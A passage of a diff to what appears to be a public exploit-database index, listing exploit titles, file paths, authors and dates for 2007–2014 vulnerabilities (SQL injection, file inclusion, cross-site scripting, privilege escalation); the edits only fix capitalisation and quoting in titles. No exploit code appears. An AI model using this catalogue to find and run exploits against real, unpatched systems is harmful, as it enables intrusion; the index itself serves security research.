Remote File Inclusion",2007-08-04,Yollubunlar.Org,php,webapps,0 30453,platforms/php/webapps/30453.txt,"snif 1.5.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0 30454,platforms/linux/remote/30454.txt,"BlueCat Networks Adonis 5.0.2.8 - TFTP Privilege Escalation",2007-08-06,defaultroute,linux,remote,0 -30455,platforms/windows/dos/30455.txt,"Microsoft Internet Explorer 6.0 - Position:Relative Denial of Service",2007-08-07,Hamachiya2,windows,dos,0 +30455,platforms/windows/dos/30455.txt,"Microsoft Internet Explorer 6 - Position:Relative Denial of Service",2007-08-07,Hamachiya2,windows,dos,0 30456,platforms/php/webapps/30456.txt,"VietPHP - _functions.php dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30457,platforms/php/webapps/30457.txt,"VietPHP - admin/index.php language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30809,platforms/windows/remote/30809.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal",2007-11-26,"Corey Lebleu",windows,remote,0 30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - Password Parameter SQL Injection",2007-11-26,JosS,php,webapps,0 30459,platforms/php/webapps/30459.txt,"VietPHP - 'index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 -30462,platforms/windows/dos/30462.py,"Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service",2007-08-08,"A.Sawan and nophie",windows,dos,0 +30462,platforms/windows/dos/30462.py,"Microsoft Windows Media Player 11 - AU Divide-by-Zero Denial of Service",2007-08-08,"A.Sawan and nophie",windows,dos,0 30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - YABBSE.INC.php Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0 -30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution Exploit",2014-01-14,"Arash Abedian",hardware,webapps,80 +30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution",2014-01-14,"Arash Abedian",hardware,webapps,80 30464,platforms/linux/local/30464.c,"Generic Software Wrappers Toolkit 1.6.3 (GSWTK) - Race Condition Privilege Escalation",2007-08-09,"Robert N. M. Watson",linux,local,0 30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 @@ -27411,9 +27412,9 @@ id,file,description,date,author,platform,type,port 30517,platforms/hardware/dos/30517.pl,"Grandstream GXV-3000 Phone - Remote Denial of Service",2007-08-22,MADYNES,hardware,dos,0 30518,platforms/php/webapps/30518.txt,"Ripe Website Manager 0.8.x - pages/delete_page.php id Parameter SQL Injection",2007-08-22,"Nagendra Kumar G",php,webapps,0 30519,platforms/multiple/dos/30519.txt,"Asura Engine Challenge B Query - Remote Stack Buffer Overflow",2007-08-22,"Luigi Auriemma",multiple,dos,0 -30520,platforms/php/webapps/30520.txt,"Wordpress 1.0.7 - Pool index.php Cross-Site Scripting",2007-08-13,MustLive,php,webapps,0 +30520,platforms/php/webapps/30520.txt,"WordPress 1.0.7 - Pool index.php Cross-Site Scripting",2007-08-13,MustLive,php,webapps,0 30521,platforms/multiple/remote/30521.txt,"Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite",2007-08-23,"Gynvael Coldwind",multiple,remote,0 -30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products - Privilege Escalation",2007-08-30,"Edi Strosar",windows,local,0 +30546,platforms/windows/local/30546.txt,"Multiple Microworld eScan Products - Privilege Escalation",2007-08-30,"Edi Strosar",windows,local,0 30523,platforms/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow",2007-08-23,"Luigi Auriemma",multiple,remote,0 30524,platforms/multiple/dos/30524.txt,"Soldat 1.4.2 - Multiple Remote Denial of Service Vulnerabilities",2007-08-23,"Luigi Auriemma",multiple,dos,0 30525,platforms/php/webapps/30525.txt,"Arcadem 2.01 - 'index.php' Remote File Inclusion",2007-08-24,sm0k3,php,webapps,0 @@ -27437,15 +27438,15 @@ id,file,description,date,author,platform,type,port 30543,platforms/linux/remote/30543.txt,"Doomsday Engine 1.8.6/1.9 - Multiple Remote Vulnerabilities",2007-08-29,"Luigi Auriemma",linux,remote,0 30544,platforms/windows/dos/30544.txt,"Yahoo! Messenger 8.1 - File Transfer Denial of Service",2007-08-29,SlicK,windows,dos,0 30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - xlaapmview.asp Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0 -30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750U ME_1.09 - Cross-Site Request Forgery",2013-12-28,"FIGHTERx war",hardware,webapps,0 +30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750u ME_1.09 - Cross-Site Request Forgery",2013-12-28,"FIGHTERx war",hardware,webapps,0 30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Inclusion",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 - Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0 30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 - Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0 30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 - 'csPreloader' Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 30550,platforms/windows/dos/30550.php,"Ofilter Player 1.1 - '.wav' Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos,0 -31030,platforms/php/webapps/31030.pl,"SpamBam Wordpress Plugin - Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0 +31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin - Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0 30872,platforms/php/webapps/30872.txt,"DomPHP 0.83 - SQL Injection",2014-01-13,Houssamix,php,webapps,0 -30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - .swf Flash File Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 +30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - form.php Multiple Parameter Cross-Site Scripting",2007-09-07,cod3in,php,webapps,0 30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - admin/header.php Multiple Parameter Cross-Site Scripting",2007-09-07,cod3in,php,webapps,0 30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 - admin.php Authentication Bypass",2007-09-03,Demential,php,webapps,0 @@ -27462,7 +27463,7 @@ id,file,description,date,author,platform,type,port 30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0 30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 - autohtml.php Local File Inclusion",2007-11-10,d3v1l,php,webapps,0 30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 - URL Parameter Cross-Site Scripting",2007-11-10,"Remco Verhoef",hardware,remote,0 -30883,platforms/windows/remote/30883.js,"BitDefender Antivirus 2008 - bdelev.dll ActiveX Control Double Free",2007-11-11,"Lionel d'Hauenens",windows,remote,0 +30883,platforms/windows/remote/30883.js,"BitDefender AntiVirus 2008 - bdelev.dll ActiveX Control Double-Free",2007-11-11,"Lionel d'Hauenens",windows,remote,0 30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0 30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0 30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 - 'login.asp' SQL Injection",2007-09-04,SmOk3,asp,webapps,0 @@ -27475,7 +27476,7 @@ id,file,description,date,author,platform,type,port 30571,platforms/asp/webapps/30571.txt,"Proxy Anket 3.0.1 - anket.asp SQL Injection",2007-09-10,Yollubunlar.Org,asp,webapps,0 30572,platforms/php/webapps/30572.txt,"PHPMyQuote 0.20 - 'index.php' SQL Injection / Cross-Site Scripting",2007-09-10,Yollubunlar.Org,php,webapps,0 30573,platforms/php/webapps/30573.txt,"SisfoKampus - dwoprn.php Arbitrary File Download",2007-09-10,PUPET,php,webapps,0 -30574,platforms/multiple/dos/30574.txt,"CellFactor Revolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",multiple,dos,0 +30574,platforms/multiple/dos/30574.txt,"CellFactor REvolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",multiple,dos,0 30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 - forum_forum.php id Parameter Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 30576,platforms/php/webapps/30576.txt,"BOINC 5.10.20 - text_search_action.php search_string Parameter Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 30577,platforms/php/webapps/30577.txt,"SWSoft Plesk 8.2 - 'login.php3' PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0 @@ -27496,7 +27497,7 @@ id,file,description,date,author,platform,type,port 32407,platforms/php/webapps/32407.txt,"BLUEPAGE CMS 2.5 - 'PHPSESSID' Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 32406,platforms/php/webapps/32406.txt,"xt:Commerce 3.04 - XTCsid Parameter Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 32405,platforms/php/webapps/32405.txt,"xt:Commerce 3.04 - advanced_search_result.php keywords Parameter Cross-Site Scripting",2008-09-22,"David Vieira-Kurz",php,webapps,0 -32404,platforms/php/webapps/32404.html,"fuzzylime (cms) 3.0 - 'usercheck.php' Cross-Site Scripting",2008-09-22,"Fabian Fingerle",php,webapps,0 +32404,platforms/php/webapps/32404.html,"Fuzzylime (cms) 3.0 - 'usercheck.php' Cross-Site Scripting",2008-09-22,"Fabian Fingerle",php,webapps,0 32403,platforms/php/webapps/32403.txt,"MapCal 0.1 - 'id' Parameter SQL Injection",2008-09-22,0x90,php,webapps,0 32402,platforms/php/webapps/32402.txt,"UNAK-CMS - Cookie Authentication Bypass",2008-09-22,Ciph3r,php,webapps,0 32401,platforms/asp/webapps/32401.txt,"rgb72 WCMS 1.0 - 'index.php' SQL Injection",2008-09-22,"CWH Underground",asp,webapps,0 @@ -27511,7 +27512,7 @@ id,file,description,date,author,platform,type,port 32393,platforms/solaris/remote/32393.txt,"Sun Solaris 9/10 Text Editors - Command Execution",2008-09-17,"Eli the Bearded",solaris,remote,0 32392,platforms/php/webapps/32392.pl,"Add a link 4 - Security Bypass / SQL Injection",2008-09-17,JosS,php,webapps,0 32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 -33141,platforms/php/remote/33141.rb,"AlienVault OSSIM - SQL Injection / Remote Code Execution",2014-05-02,Metasploit,php,remote,443 +33141,platforms/php/remote/33141.rb,"Alienvault OSSIM - SQL Injection / Remote Code Execution",2014-05-02,Metasploit,php,remote,443 32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - '.m3u' Crash (PoC)",2014-02-26,"Gabor Seljan",windows,dos,0 32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",php,webapps,0 @@ -27540,7 +27541,7 @@ id,file,description,date,author,platform,type,port 30599,platforms/cgi/webapps/30599.txt,"WebBatch - webbatch.exe dumpinputdata Variable Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0 30601,platforms/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module - Multiple Cross-Site Scripting Vulnerabilities",2007-09-20,x0kster,php,webapps,0 -30602,platforms/php/webapps/30602.html,"Wordpress 2.0 - wp-register.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 +30602,platforms/php/webapps/30602.html,"WordPress 2.0 - wp-register.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 30603,platforms/php/webapps/30603.html,"Xcms 1.1/1.7 - Password Parameter Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps,0 30604,platforms/linux/local/30604.c,"Linux Kernel 2.6.x - Ptrace Privilege Escalation",2007-09-21,"Wojciech Purczynski",linux,local,0 30605,platforms/linux/local/30605.c,"Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure",2007-09-21,Karimo_DM,linux,local,0 @@ -27557,7 +27558,7 @@ id,file,description,date,author,platform,type,port 30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 - admin/emoticonlist.php l_emoticonlist Parameter Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - admin/layout2b.php l_username Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - comment.php backurl Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 -30619,platforms/windows/dos/30619.txt,"Microsoft Windows Explorer - .png Image Local Denial Of Service",2007-07-26,"Xavier Roche",windows,dos,0 +30619,platforms/windows/dos/30619.txt,"Microsoft Windows Explorer - '.png' Image Local Denial Of Service",2007-07-26,"Xavier Roche",windows,dos,0 30620,platforms/linux/local/30620.txt,"Xen 3.0.3 - pygrub TOOLS/PYGRUB/SRC/GRUBCONF.PY Local Command Injection",2007-09-22,"Joris van Rantwijk",linux,local,0 30621,platforms/asp/webapps/30621.txt,"Novus 1.0 - Buscar.asp Cross-Site Scripting",2007-09-27,Zutr4,asp,webapps,0 30622,platforms/windows/remote/30622.html,"Microsoft Internet Explorer 5.0.1 - Arbitrary File Upload",2007-09-27,"Ronald van den Heetkamp",windows,remote,0 @@ -27590,9 +27591,9 @@ id,file,description,date,author,platform,type,port 30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow",2007-10-08,Erik,linux,dos,0 30649,platforms/cgi/webapps/30649.txt,"NetWin DNews - Dnewsweb.exe Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 - SIP From Field HTML Injection",2007-10-09,"Radu State",hardware,remote,0 -30651,platforms/php/webapps/30651.txt,"Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Inclusion",2007-10-10,Cyber-Crime,php,webapps,0 +30651,platforms/php/webapps/30651.txt,"WebMaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Inclusion",2007-10-10,Cyber-Crime,php,webapps,0 30652,platforms/hardware/remote/30652.txt,"Cisco IOS 12.3 - LPD Remote Buffer Overflow",2007-10-10,"Andy Davis",hardware,remote,0 -30653,platforms/php/webapps/30653.txt,"PHPMyAdmin 2.11.1 - setup.php Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps,0 +30653,platforms/php/webapps/30653.txt,"phpMyAdmin 2.11.1 - setup.php Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps,0 30654,platforms/php/webapps/30654.txt,"ActiveKB NX 2.6 - 'index.php' Cross-Site Scripting",2007-10-11,durito,php,webapps,0 30655,platforms/php/webapps/30655.txt,"Joomla! 1.0.13 - Search Component SearchWord Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 30656,platforms/php/webapps/30656.txt,"boastMachine 2.8 - 'index.php' Local File Inclusion",2007-10-11,iNs,php,webapps,0 @@ -27621,7 +27622,7 @@ id,file,description,date,author,platform,type,port 30675,platforms/jsp/webapps/30675.txt,"InnovaPortal - tc/contents/home001.jsp contentid Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 30676,platforms/jsp/webapps/30676.txt,"InnovaPortal - msg.jsp msg Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote,0 -30678,platforms/multiple/remote/30678.java,"Nortel Networks UNIStim IP Softphone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",multiple,remote,0 +30678,platforms/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",multiple,remote,0 30679,platforms/hardware/dos/30679.pl,"Nortel Networks - Multiple UNIStim VoIP Products Remote Eavesdrop",2007-10-18,"Daniel Stirnimann",hardware,dos,0 30680,platforms/windows/local/30680.txt,"Macrovision SafeDisc - SecDRV.SYS Method_Neither Privilege Escalation",2007-10-18,"Elia Florio",windows,local,0 30681,platforms/windows/local/30681.txt,"SpeedFan - Speedfan.sys Privilege Escalation",2007-10-18,"Ruben Santamarta ",windows,local,0 @@ -27636,11 +27637,11 @@ id,file,description,date,author,platform,type,port 30689,platforms/php/webapps/30689.php,"Taboada Macronews 1.0 - SQL Injection",2014-01-04,Jefrey,php,webapps,0 31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 31028,platforms/php/webapps/31028.txt,"Article Dashboard - 'admin/login.php' Multiple SQL Injection",2008-01-15,Xcross87,php,webapps,0 -31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for Wordpress 0.1.6 Plugin - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps,0 +31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps,0 30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 -30694,platforms/php/webapps/30694.txt,"SocketMail 2.2.1 - lostpwd.php Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0 +30694,platforms/php/webapps/30694.txt,"Socketmail 2.2.1 - lostpwd.php Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0 30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 - rnote.php Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0 30696,platforms/asp/webapps/30696.txt,"SearchSimon Lite 1.0 - Filename.asp Cross-Site Scripting",2007-10-20,"Aria-Security Team",asp,webapps,0 30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 - 'index.php' Local File Inclusion",2007-10-20,sekuru,php,webapps,0 @@ -27651,15 +27652,15 @@ id,file,description,date,author,platform,type,port 30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 - Malformed XBL Constructor Remote Denial of Service",2007-10-22,"Soroush Dalili",multiple,dos,0 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 -30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 +30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - Component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - index.asp SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0 30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - Includes.php Remote File Inclusion",2007-10-24,Alucar,php,webapps,0 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - Page.asp SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 -30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x - Remote Directory Traversal",2007-10-25,"Pete Foster",linux,remote,0 -30712,platforms/php/webapps/30712.txt,"Multi-Forums - directory.php Multiple SQL Injection",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 +30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x - Directory Traversal",2007-10-25,"Pete Foster",linux,remote,0 +30712,platforms/php/webapps/30712.txt,"Multi-Forums - Directory.php Multiple SQL Injection",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial Of Service",2007-10-26,"The Hacker Webzine",multiple,dos,0 30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 - IMAP4 LSUB Buffer Overflow",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0 -30715,platforms/php/webapps/30715.txt,"Wordpress 2.3 - Edit-Post-Rows.php Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 +30715,platforms/php/webapps/30715.txt,"WordPress 2.3 - Edit-Post-Rows.php Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 30716,platforms/php/webapps/30716.txt,"Smart-Shop - 'index.php' Multiple Parameter Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 30717,platforms/php/webapps/30717.txt,"Omnistar Live - KB.php Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 30718,platforms/php/webapps/30718.txt,"Saxon 5.4 - Menu.php Cross-Site Scripting",2007-10-29,netVigilance,php,webapps,0 @@ -27678,14 +27679,14 @@ id,file,description,date,author,platform,type,port 30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner - ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0 30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 - 'index.php' Local File Inclusion",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 - Dialog.php Information Disclosure",2007-11-01,d3hydr8,php,webapps,0 -30733,platforms/php/webapps/30733.txt,"PHPMyAdmin 2.11.1 - Server_Status.php Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps,0 +30733,platforms/php/webapps/30733.txt,"phpMyAdmin 2.11.1 - Server_Status.php Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps,0 30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - admin/index.php Cross-Site Scripting",2007-11-02,"Ivan Sanchez",php,webapps,0 30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 - 'index.php' Local File Inclusion",2007-11-03,joseph.giron13,php,webapps,0 30736,platforms/linux/remote/30736.txt,"GNU Emacs 22.1 - Local Variable Handling Code Execution",2007-11-02,"Drake Wilson",linux,remote,0 30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 - Upload_Config.php Remote File Inclusion",2007-11-05,"arfis project",php,webapps,0 30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 - Articles.php SQL Injection",2007-11-05,r00t,php,webapps,0 30739,platforms/php/webapps/30739.txt,"JLMForo System - Buscado.php Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0 -30740,platforms/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 - Login Procedure Authentication Bypass",2007-11-05,"David Smith",hardware,remote,0 +30740,platforms/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 - Login procedure Authentication Bypass",2007-11-05,"David Smith",hardware,remote,0 30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 - 'index.php' Local File Inclusion",2007-11-05,"BorN To K!LL",php,webapps,0 30742,platforms/multiple/remote/30742.txt,"OpenBase 10.0.x - Buffer Overflow / Remote Command Execution",2007-11-05,"Kevin Finisterre",multiple,remote,0 30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 - igallery.asp Remote Information Disclosure",2007-11-05,hackerbinhphuoc,asp,webapps,0 @@ -27705,33 +27706,33 @@ id,file,description,date,author,platform,type,port 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0 -30760,platforms/php/dos/30760.txt,"PHP 5.2.5 - Multiple GetText Functions Denial Of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos,0 +30760,platforms/php/dos/30760.txt,"PHP 5.2.5 - Multiple GetText functions Denial Of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos,0 30761,platforms/windows/dos/30761.html,"WebEx GPCContainer - Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos,0 -30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 Wordpress Plugin - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0 +30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 WordPress Plugin - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0 -30765,platforms/osx/local/30765.c,"Apple Mac OSX 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 +30765,platforms/osx/local/30765.c,"Apple Mac OS X 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0 30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0 -30768,platforms/multiple/remote/30768.txt,"IBM WebSphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote,0 -30769,platforms/php/webapps/30769.txt,"Nuked-Klan 1.7.5 - File Parameter News Module Cross-Site Scripting",2007-11-15,Bl@ckM@mba,php,webapps,0 +30768,platforms/multiple/remote/30768.txt,"IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote,0 +30769,platforms/php/webapps/30769.txt,"Nuked-klaN 1.7.5 - File Parameter News Module Cross-Site Scripting",2007-11-15,Bl@ckM@mba,php,webapps,0 30770,platforms/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0 30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller - Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote,0 30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0 -30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine - .MDB File Parsing Remote Buffer Overflow",2007-11-16,cocoruder,windows,dos,0 +30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine - '.MDB' File Parsing Remote Buffer Overflow",2007-11-16,cocoruder,windows,dos,0 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL 